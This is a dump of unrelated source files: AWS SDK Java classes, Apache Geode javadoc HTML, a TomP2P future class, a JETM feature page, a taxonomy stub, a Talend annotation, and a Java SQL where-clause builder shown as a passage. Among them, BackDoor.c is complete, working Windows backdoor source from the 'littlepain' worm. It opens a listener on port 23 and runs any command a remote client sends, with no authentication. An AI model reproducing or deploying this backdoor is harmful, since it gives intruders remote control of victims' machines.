hashCode = prime * hashCode + ((getLakeFormationConfiguration() == null) ? 0 : getLakeFormationConfiguration().hashCode());
hashCode = prime * hashCode + ((getConfiguration() == null) ? 0 : getConfiguration().hashCode());
hashCode = prime * hashCode + ((getCrawlerSecurityConfiguration() == null) ? 0 : getCrawlerSecurityConfiguration().hashCode());
hashCode = prime * hashCode + ((getTags() == null) ? 0 : getTags().hashCode());
return hashCode;
}
@Override
public CreateCrawlerRequest clone() {
return (CreateCrawlerRequest) super.clone();
}
}
| aws/aws-sdk-java | aws-java-sdk-glue/src/main/java/com/amazonaws/services/glue/model/CreateCrawlerRequest.java | Java | apache-2.0 | 36,471 |
/*
* Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.cloudwatch.model.transform;
import javax.annotation.Generated;
import com.amazonaws.SdkClientException;
import com.amazonaws.Request;
import com.amazonaws.DefaultRequest;
import com.amazonaws.http.HttpMethodName;
import com.amazonaws.services.cloudwatch.model.*;
import com.amazonaws.transform.Marshaller;
import com.amazonaws.util.StringUtils;
/**
* ListDashboardsRequest Marshaller
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class ListDashboardsRequestMarshaller implements Marshaller<Request<ListDashboardsRequest>, ListDashboardsRequest> {
public Request<ListDashboardsRequest> marshall(ListDashboardsRequest listDashboardsRequest) {
if (listDashboardsRequest == null) {
throw new SdkClientException("Invalid argument passed to marshall(...)");
}
Request<ListDashboardsRequest> request = new DefaultRequest<ListDashboardsRequest>(listDashboardsRequest, "AmazonCloudWatch");
request.addParameter("Action", "ListDashboards");
request.addParameter("Version", "2010-08-01");
request.setHttpMethod(HttpMethodName.POST);
if (listDashboardsRequest.getDashboardNamePrefix() != null) {
request.addParameter("DashboardNamePrefix", StringUtils.fromString(listDashboardsRequest.getDashboardNamePrefix()));
}
if (listDashboardsRequest.getNextToken() != null) {
request.addParameter("NextToken", StringUtils.fromString(listDashboardsRequest.getNextToken()));
}
return request;
}
}
| aws/aws-sdk-java | aws-java-sdk-cloudwatch/src/main/java/com/amazonaws/services/cloudwatch/model/transform/ListDashboardsRequestMarshaller.java | Java | apache-2.0 | 2,151 |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_66-internal) on Wed Apr 13 11:47:04 PDT 2016 -->
<title>ManagementException (Apache Geode 1.0.0-incubating.M2)</title>
<meta name="date" content="2016-04-13">
<link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="ManagementException (Apache Geode 1.0.0-incubating.M2)";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-all.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../com/gemstone/gemfire/management/LockServiceMXBean.html" title="interface in com.gemstone.gemfire.management"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../../../com/gemstone/gemfire/management/ManagementService.html" title="class in com.gemstone.gemfire.management"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?com/gemstone/gemfire/management/ManagementException.html" target="_top">Frames</a></li>
<li><a href="ManagementException.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#methods.inherited.from.class.com.gemstone.gemfire.GemFireException">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li>Method</li>
</ul>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">com.gemstone.gemfire.management</div>
<h2 title="Class ManagementException" class="title">Class ManagementException</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>java.lang.Throwable</li>
<li>
<ul class="inheritance">
<li>java.lang.Exception</li>
<li>
<ul class="inheritance">
<li>java.lang.RuntimeException</li>
<li>
<ul class="inheritance">
<li><a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">com.gemstone.gemfire.GemFireException</a></li>
<li>
<ul class="inheritance">
<li>com.gemstone.gemfire.management.ManagementException</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<dl>
<dt>All Implemented Interfaces:</dt>
<dd>java.io.Serializable</dd>
</dl>
<dl>
<dt>Direct Known Subclasses:</dt>
<dd><a href="../../../../com/gemstone/gemfire/management/AlreadyRunningException.html" title="class in com.gemstone.gemfire.management">AlreadyRunningException</a></dd>
</dl>
<hr>
<br>
<pre>public class <span class="typeNameLabel">ManagementException</span>
extends <a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">GemFireException</a></pre>
<div class="block">A <code>ManagementException</code> is a general exception that may be thrown
when any administration or monitoring operation on a GemFire component
fails.
Various management and monitoring exceptions are wrapped in
<code>ManagementException<code>s.</div>
<dl>
<dt><span class="simpleTagLabel">Since:</span></dt>
<dd>7.0</dd>
<dt><span class="seeLabel">See Also:</span></dt>
<dd><a href="../../../../serialized-form.html#com.gemstone.gemfire.management.ManagementException">Serialized Form</a></dd>
</dl>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException--">ManagementException</a></span>()</code>
<div class="block">Constructs a new exception with a <code>null</code> detail message.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.String-">ManagementException</a></span>(java.lang.String message)</code>
<div class="block">Constructs a new exception with the specified detail message.</div>
</td>
</tr>
<tr class="altColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.String-java.lang.Throwable-">ManagementException</a></span>(java.lang.String message,
java.lang.Throwable cause)</code>
<div class="block">Constructs a new ManagementException with the specified detail message and
cause.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.Throwable-">ManagementException</a></span>(java.lang.Throwable cause)</code>
<div class="block">Constructs a new ManagementException by wrapping the specified cause.</div>
</td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method.summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.com.gemstone.gemfire.GemFireException">
<!-- -->
</a>
<h3>Methods inherited from class com.gemstone.gemfire.<a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">GemFireException</a></h3>
<code><a href="../../../../com/gemstone/gemfire/GemFireException.html#getRootCause--">getRootCause</a></code></li>
</ul>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.java.lang.Throwable">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Throwable</h3>
<code>addSuppressed, fillInStackTrace, getCause, getLocalizedMessage, getMessage, getStackTrace, getSuppressed, initCause, printStackTrace, printStackTrace, printStackTrace, setStackTrace, toString</code></li>
</ul>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="ManagementException--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>ManagementException</h4>
<pre>public ManagementException()</pre>
<div class="block">Constructs a new exception with a <code>null</code> detail message. The
cause is not initialized, and may subsequently be initialized by a call to
<code>Throwable.initCause(java.lang.Throwable)</code>.</div>
</li>
</ul>
<a name="ManagementException-java.lang.String-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>ManagementException</h4>
<pre>public ManagementException(java.lang.String message)</pre>
<div class="block">Constructs a new exception with the specified detail message. The cause is
not initialized and may subsequently be initialized by a call to
<code>Throwable.initCause(java.lang.Throwable)</code>.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>message</code> - The detail message.</dd>
</dl>
</li>
</ul>
<a name="ManagementException-java.lang.String-java.lang.Throwable-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>ManagementException</h4>
<pre>public ManagementException(java.lang.String message,
java.lang.Throwable cause)</pre>
<div class="block">Constructs a new ManagementException with the specified detail message and
cause.
<p>
Note that the detail message associated with <code>cause</code> is
<i>not</i> automatically incorporated in this runtime exception's detail
message.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>message</code> - The detail message.</dd>
<dd><code>cause</code> - The cause of this exception or <code>null</code> if the cause is
unknown.</dd>
</dl>
</li>
</ul>
<a name="ManagementException-java.lang.Throwable-">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>ManagementException</h4>
<pre>public ManagementException(java.lang.Throwable cause)</pre>
<div class="block">Constructs a new ManagementException by wrapping the specified cause. The
detail for this exception will be null if the cause is null or
cause.toString() if a cause is provided.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>cause</code> - The cause of this exception or <code>null</code> if the cause is
unknown.</dd>
</dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-all.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../com/gemstone/gemfire/management/LockServiceMXBean.html" title="interface in com.gemstone.gemfire.management"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../../../com/gemstone/gemfire/management/ManagementService.html" title="class in com.gemstone.gemfire.management"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?com/gemstone/gemfire/management/ManagementException.html" target="_top">Frames</a></li>
<li><a href="ManagementException.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#methods.inherited.from.class.com.gemstone.gemfire.GemFireException">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li>Method</li>
</ul>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
| azwickey-pivotal/oauth2-gemfire-sample | apache-geode-1.0.0-incubating.M2/javadoc/com/gemstone/gemfire/management/ManagementException.html | HTML | apache-2.0 | 13,502 |
/*
* Copyright 2013 Thomas Bocek
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package net.tomp2p.futures;
/**
* A generic future that can be used to set a future to complete with an attachment.
*
* @author Thomas Bocek
*
* @param <K>
*/
public class FutureDone<K> extends BaseFutureImpl<FutureDone<K>> {
public static FutureDone<Void> SUCCESS = new FutureDone<Void>().done();
private K object;
/**
* Creates a new future for the shutdown operation.
*/
public FutureDone() {
self(this);
}
/**
* Set future as finished and notify listeners.
*
* @return This class
*/
public FutureDone<K> done() {
done(null);
return this;
}
/**
* Set future as finished and notify listeners.
*
* @param object
* An object that can be attached.
* @return This class
*/
public FutureDone<K> done(final K object) {
synchronized (lock) {
if (!completedAndNotify()) {
return this;
}
this.object = object;
this.type = BaseFuture.FutureType.OK;
}
notifyListeners();
return this;
}
/**
* @return The attached object
*/
public K object() {
synchronized (lock) {
return object;
}
}
}
| jonaswagner/TomP2P | core/src/main/java/net/tomp2p/futures/FutureDone.java | Java | apache-2.0 | 1,873 |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US">
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"/>
<title>Java(TM) Execution Time Measurement Library</title>
<link rel="stylesheet" type="text/css" href="default.css"/>
</head>
<body>
<div class="menu">
<a href="index.html">Home</a>
|
<a href="doc.html"><b>Documentation</b></a>
|
<a href="faq.html">FAQ</a>
|
<a href="../api/index.html">JavaDoc</a>
|
<a href="files.html"><b>Download</b></a>
|
<a href="svn.html">SVN</a>
|
<a href="http://sourceforge.net/mail/?group_id=109626">Mailing Lists</a>
|
<a href="http://sourceforge.net/projects/jetm/">Sourceforge Project Page</a>
</div>
<div id="content">
<div id="header">Java™ Execution Time Measurement Library</div>
<div id="subheader">Runtime performance monitoring made easy</div>
<div id="main">
<h3>JETM Featureset</h3>
<p>
Obviously the best way to explore JETM features is looking at the
<a href="http://jetm.void.fm/jetm-demo/">online demo application</a>. Nevertheless this page lists
the current JETM feature set.
</p>
<h4>JETM Core Features</h4>
<ul>
<li>Declarative and programmatic performance monitoring</li>
<li>Flat and nested (tree-based) recording</li>
<li>Low overhead - can and <b>should</b> be used in production</li>
<li>Pluggable result visualization including HTML, Swing and Standard Out</li>
<li>Simple setup and integration</li>
<li>No VM level instrumentation requirement, JETM can and should be used per deployment unit</li>
<li>Persistent performance results</li>
</ul>
<h4>Supported JDKs (tested, but not limited to)</h4>
<ul>
<li>Sun JDK 1.3, 1.4, 5.0, 6.0</li>
<li>Bea JRockit</li>
</ul>
<h4>Supported timers</h4>
<ul>
<li>java.lang.System#nanoTime</li>
<li>sun.misc.Perf</li>
<li>java.lang.System#currentTimeMillis()</li>
</ul>
<h4>Framework integrations</h4>
<ul>
<li>Declarative performance monitoring using <a href="howto/spring_integration.html">Springframework</a> AOP,
<a href="howto/aspectwerkz_integration.html">AspectWerkz</a> and other AOP Alliance Frameworks
</li>
<li>Build-in <a href="howto/drop-in-console.html">HTTP Server</a> for performance monitoring</li>
<li>Raw Data Logging using <a href="http://logging.apache.org/log4j">Log4J</a>, <a
href="http://jakarta.apache.org/commons/logging/">commons-logging</a> and <i>java.util.logging</i></li>
<li>Result visualization using <a href="http://rrd4j.dev.java.net/">RRD4j</a></li>
<li>Simple JMX Integration</li>
</ul>
</div>
</div>
<div class="menu">
<a href="index.html">Home</a>
|
<a href="doc.html"><b>Documentation</b></a>
|
<a href="faq.html">FAQ</a>
|
<a href="../api/index.html">JavaDoc</a>
|
<a href="files.html"><b>Download</b></a>
|
<a href="svn.html">SVN</a>
|
<a href="http://sourceforge.net/mail/?group_id=109626">Mailing Lists</a>
|
<a href="http://sourceforge.net/projects/jetm/">Sourceforge Project Page</a>
</div>
</body>
<!-- Last modified $Date: 2007-07-08 23:23:02 +0200 (So, 08 Jul 2007) $ -->
</html> | jasonwee/videoOnCloud | lib/jetm-1.2.3/doc/site/features.html | HTML | apache-2.0 | 3,392 |
# Manglietia dolichogyna Dandy ex Noot. SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Magnoliales/Magnoliaceae/Magnolia/Magnolia utilis/ Syn. Manglietia dolichogyna/README.md | Markdown | apache-2.0 | 194 |
#include "littlepain.h"
/* the backdoor :) */
DWORD WINAPI BackDoor(LPVOID Data)
{
SOCKET server_sock,client_sock;
struct sockaddr_in serv_inf;
struct timeval tv;
fd_set ft;
char exec[MAX_PATH];
DWORD cnt;
STARTUPINFO inf_prog;
PROCESS_INFORMATION info_pr;
if((server_sock = socket(AF_INET,SOCK_STREAM,
IPPROTO_TCP)) == INVALID_SOCKET)
{
return 0;
}
serv_inf.sin_family = AF_INET;
serv_inf.sin_addr.s_addr = htonl(INADDR_ANY);
serv_inf.sin_port = htons(23);
if(bind(server_sock,(struct sockaddr *)&serv_inf,
sizeof(struct sockaddr_in)) == SOCKET_ERROR)
{
return 0;
}
listen(server_sock,SOMAXCONN);
/* main loop! */
while(1)
{
client_sock = accept(server_sock,NULL,0);
tv.tv_usec = 0;
tv.tv_sec = 60;
FD_ZERO(&ft);
FD_SET(client_sock,&ft);
/* send a msg */
send(client_sock,"[:: littlepain ::] by WarGame\r\n",31,0);
while(1)
{
if(select(client_sock+1,&ft,NULL,NULL,&tv) > 0)
{
memset(exec,0,MAX_PATH);
recv(client_sock,exec,MAX_PATH,0);
/* remove "\r" and "\n" */
for(cnt = 0;cnt < strlen(exec);cnt++)
{
if(exec[cnt] == '\r' || exec[cnt] == '\n')
{
exec[cnt] = 0;
}
}
/* (try to) execute the command */
memset(&inf_prog,0,sizeof(STARTUPINFO));
memset(&info_pr,0,sizeof(PROCESS_INFORMATION));
inf_prog.cb = sizeof(STARTUPINFO);
inf_prog.dwFlags = STARTF_USESHOWWINDOW;
inf_prog.wShowWindow = SW_SHOW;
if(CreateProcess(NULL,exec,NULL,NULL,FALSE,CREATE_NEW_CONSOLE,
NULL,NULL,&inf_prog,&info_pr))
{
send(client_sock,"Executed!\r\n",11,0);
}
else
{
send(client_sock,"Not Executed!\r\n",15,0);
}
}
else
{
closesocket(client_sock);
break;
}
}
}
} | ZHYfeng/malicious-code-conceal | 0_mailcious-code/useful/c_windows/littlepain/BackDoor.c | C | apache-2.0 | 1,857 |
/**
* Copyright (C) 2006-2020 Talend Inc. - www.talend.com
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.talend.sdk.component.api.configuration.constraint;
import static java.lang.annotation.ElementType.FIELD;
import static java.lang.annotation.ElementType.PARAMETER;
import static java.lang.annotation.RetentionPolicy.RUNTIME;
import java.lang.annotation.Retention;
import java.lang.annotation.Target;
import java.util.Collection;
import org.talend.sdk.component.api.configuration.constraint.meta.Validation;
import org.talend.sdk.component.api.meta.Documentation;
@Validation(expectedTypes = Collection.class, name = "uniqueItems")
@Target({ FIELD, PARAMETER })
@Retention(RUNTIME)
@Documentation("Ensure the elements of the collection must be distinct (kind of set).")
public @interface Uniques {
}
| chmyga/component-runtime | component-api/src/main/java/org/talend/sdk/component/api/configuration/constraint/Uniques.java | Java | apache-2.0 | 1,331 |
package de.mhu.com.morse.channel.sql;
import java.lang.reflect.InvocationTargetException;
import java.sql.SQLException;
import java.util.Iterator;
import java.util.LinkedList;
import de.mhu.lib.ASql;
import de.mhu.lib.dtb.Sth;
import de.mhu.com.morse.aaa.IAclManager;
import de.mhu.com.morse.channel.CMql;
import de.mhu.com.morse.channel.IChannelDriverServer;
import de.mhu.com.morse.channel.IConnectionServer;
import de.mhu.com.morse.channel.IQueryFunction;
import de.mhu.com.morse.channel.IQueryWhereFunction;
import de.mhu.com.morse.mql.ICompiledQuery;
import de.mhu.com.morse.types.IAttribute;
import de.mhu.com.morse.types.IAttributeDefault;
import de.mhu.com.morse.types.ITypes;
import de.mhu.com.morse.usr.UserInformation;
import de.mhu.com.morse.utils.AttributeUtil;
import de.mhu.com.morse.utils.MorseException;
public class WhereSqlListener implements WhereParser.IWhereListener {
private StringBuffer sb = null;
private Descriptor desc;
private SqlDriver driver;
private IConnectionServer con;
private ITypes types;
private IAclManager aclm;
private UserInformation user;
private ICompiledQuery code;
private boolean needComma;
public WhereSqlListener( SqlDriver pDriver, IConnectionServer pCon, ITypes pTypes, IAclManager pAclm, UserInformation pUser, Descriptor pDesc, ICompiledQuery pCode, StringBuffer dest ) {
desc = pDesc;
driver = pDriver;
con = pCon;
types = pTypes;
aclm = pAclm;
user = pUser;
code = pCode;
sb = dest;
}
public int appendTableSelect(String name, int off) throws MorseException {
name = name.toLowerCase();
if ( ! AttributeUtil.isAttrName( name, true ) )
throw new MorseException( MorseException.UNKNOWN_ATTRIBUTE, name );
Object[] obj = desc.attrMap.get( name );
if ( obj == null )
throw new MorseException( MorseException.UNKNOWN_ATTRIBUTE, name );
if ( obj.length == 0 )
throw new MorseException( MorseException.ATTR_AMBIGIOUS, name );
String tName = (String)obj[3];
int pos = tName.indexOf('.');
if ( pos < 0 )
tName = IAttribute.M_ID;
else
tName = tName.substring( 0, pos + 1 ) + IAttribute.M_ID;
sb.append( driver.getColumnName( tName ) );
sb.append( " IN ( SELECT " );
sb.append( driver.getColumnName( IAttribute.M_ID ) );
sb.append( " FROM r_" );
sb.append( ((IAttribute)obj[1]).getSourceType().getName() ).append( '_' ).append( ((IAttribute)obj[1]).getName() );
sb.append( " WHERE " );
Descriptor desc2 = new Descriptor();
Attr a = new Attr();
a.name = IAttribute.M_ID;
desc2.addAttr( a );
// find all tables / types
Table newTable = new Table();
newTable.name = ((IAttribute)obj[1]).getSourceType().getName() + '.' + ((IAttribute)obj[1]).getName();
desc2.addTable( newTable );
SqlUtils.checkTables( desc2, types, con, user, aclm );
SqlUtils.checkAttributes( con, desc2, user, aclm );
off+=2;
off = SqlUtils.createWhereClause( con, driver, off, code, desc2, types, sb, user, aclm );
// sb.append( ')' );
off++;
return off;
}
public void brackedClose() {
sb.append( ')' );
}
public void brackedOpen() {
sb.append( '(' );
}
public void compareEQ(String left, String right) {
sb.append( left ).append( '=' ).append( right );
}
public void compareGT(String left, String right) {
sb.append( left ).append( '>' ).append( right );
}
public void compareGTEQ(String left, String right) {
sb.append( left ).append( ">=" ).append( right );
}
public void compareINBegin(String left) {
sb.append( left ).append( " IN (" );
needComma = false;
}
public void compareINEnd() {
sb.append( ')' );
}
public void compareINValue(String string) {
if ( needComma )
sb.append( ',' );
needComma = true;
sb.append( string );
}
public void compareLIKE(String left, String right) {
sb.append( left ).append( " LIKE " ).append( right );
}
public void compareLT(String left, String right) {
sb.append( left ).append( '<' ).append( right );
}
public void compareLTEQ(String left, String right) {
sb.append( left ).append( "<=" ).append( right );
}
public void compareNOTEQ(String left, String right) {
sb.append( left ).append( "!=" ).append( right );
}
public int compareSubSelect(String name, int off, boolean distinct) throws MorseException {
Descriptor desc2 = new Descriptor();
off = SqlUtils.findAttributes(off, code, desc2);
if ( desc.attrSize == 0 )
throw new MorseException( MorseException.NO_ATTRIBUTES );
off++; // FROM
// find all tables / types
off = SqlUtils.findTables(off, code, desc2 );
SqlUtils.checkTables( desc2, types, con, user, aclm );
SqlUtils.checkAttributes( con, desc2, user, aclm );
SqlUtils.postCheckAttributes( desc2 );
SqlUtils.checkFunctions( con, desc2, desc2, user, driver.getAclManager() );
StringBuffer sb2 = new StringBuffer();
SqlUtils.createSelect( driver, desc2, sb2, distinct );
boolean hasWhere = false;
if ( SqlUtils.needHintWhere( driver, desc2 ) ) {
if ( ! hasWhere ) {
sb2.append( " WHERE (" );
} else {
sb2.append( " AND (" );
}
SqlUtils.createHintWhereClause( con, driver, desc2, driver.getTypes(), sb2, user, aclm );
sb2.append( " ) " );
hasWhere = true;
}
if ( code.getInteger( off ) == CMql.WHERE ) {
if ( ! hasWhere ) {
sb2.append( " WHERE (" );
} else {
sb2.append( " AND (" );
}
off++;
off = SqlUtils.createWhereClause( con, driver, off, code, desc2, types, sb2, user, aclm );
}
sb.append( name ).append( " IN ( " ).append( sb2.toString() ).append( " ) ");
off++; // )
return off;
}
public String executeFunction( IQueryFunction function, LinkedList<Object> functionAttrs ) throws MorseException {
// Object[] obj = desc.attrMap.get( aName.toLowerCase() );
if ( function instanceof IQuerySqlFunction ) {
String[] attrs = (String[])functionAttrs.toArray( new String[ functionAttrs.size() ] );
for ( int j = 0; j < attrs.length; j++ ) {
attrs[j] = SqlUtils.checkAttribute( driver, null, attrs[j], desc, user );
}
return ((IQuerySqlFunction)function).appendSqlCommand( driver, attrs );
} else {
Object[] values = new Object[ functionAttrs.size() ];
Class[] classes = new Class[ functionAttrs.size() ];
int cnt = 0;
for ( Iterator i = functionAttrs.iterator(); i.hasNext(); ) {
values[cnt] = i.next();
classes[cnt] = values[cnt].getClass();
cnt++;
}
if ( function instanceof IQueryWhereFunction )
return ((IQueryWhereFunction)function).getSingleResult( values );
else {
try {
function.getClass().getMethod( "append", classes ).invoke( function, values );
} catch (Exception e) {
throw new MorseException( MorseException.ERROR, e );
}
return function.getResult();
}
}
}
public void appendInFunction( String left, IQueryFunction function, LinkedList<Object> functionAttrs) throws MorseException {
Sth sth = null;
String tmpName = null;
try {
Object[] obj = desc.attrMap.get( left.toLowerCase() );
tmpName = "x_" + driver.getNextTmpId();
String drop = driver.getDropTmpTableSql( tmpName );
sth = driver.internatConnection.getPool().aquireStatement();
if ( drop != null ) {
try {
sth.executeUpdate( drop );
} catch ( SQLException sqle ) {
}
}
String create = new StringBuffer()
.append( driver.getCreateTmpTablePrefixSql() )
.append( ' ' )
.append( tmpName )
.append( " ( v " )
.append( driver.getColumnDefinition( (IAttribute)obj[1], false ) )
.append( ") ")
.append( driver.getCreateTmpTableSuffixSql() )
.toString();
sth.executeUpdate( create );
sth.executeUpdate( driver.getCreateTmpIndexSql( 1, tmpName, "v" ) );
if ( ! ( function instanceof IQueryWhereFunction ) )
throw new MorseException( MorseException.FUNCTION_NOT_COMPATIBLE );
Iterator<String> res = ((IQueryWhereFunction)function).getRepeatingResult( (Object[])functionAttrs.toArray( new Object[ functionAttrs.size() ] ) );
while ( res.hasNext() ) {
String insert = "INSERT INTO " + tmpName + "(v) VALUES (" + SqlUtils.getValueRepresentation(driver, (IAttribute)obj[1], res.next() ) + ")";
sth.executeUpdate( insert );
}
} catch ( Exception sqle ) {
if ( sqle instanceof MorseException ) throw (MorseException)sqle;
throw new MorseException( MorseException.ERROR, sqle );
} finally {
try { sth.release(); } catch ( Exception ex ) {}
}
desc.addTmpTable( tmpName );
sb.append( " IN ( SELECT v FROM " ).append( tmpName ).append( " ) ");
}
public void operatorAnd() {
sb.append( " AND " );
}
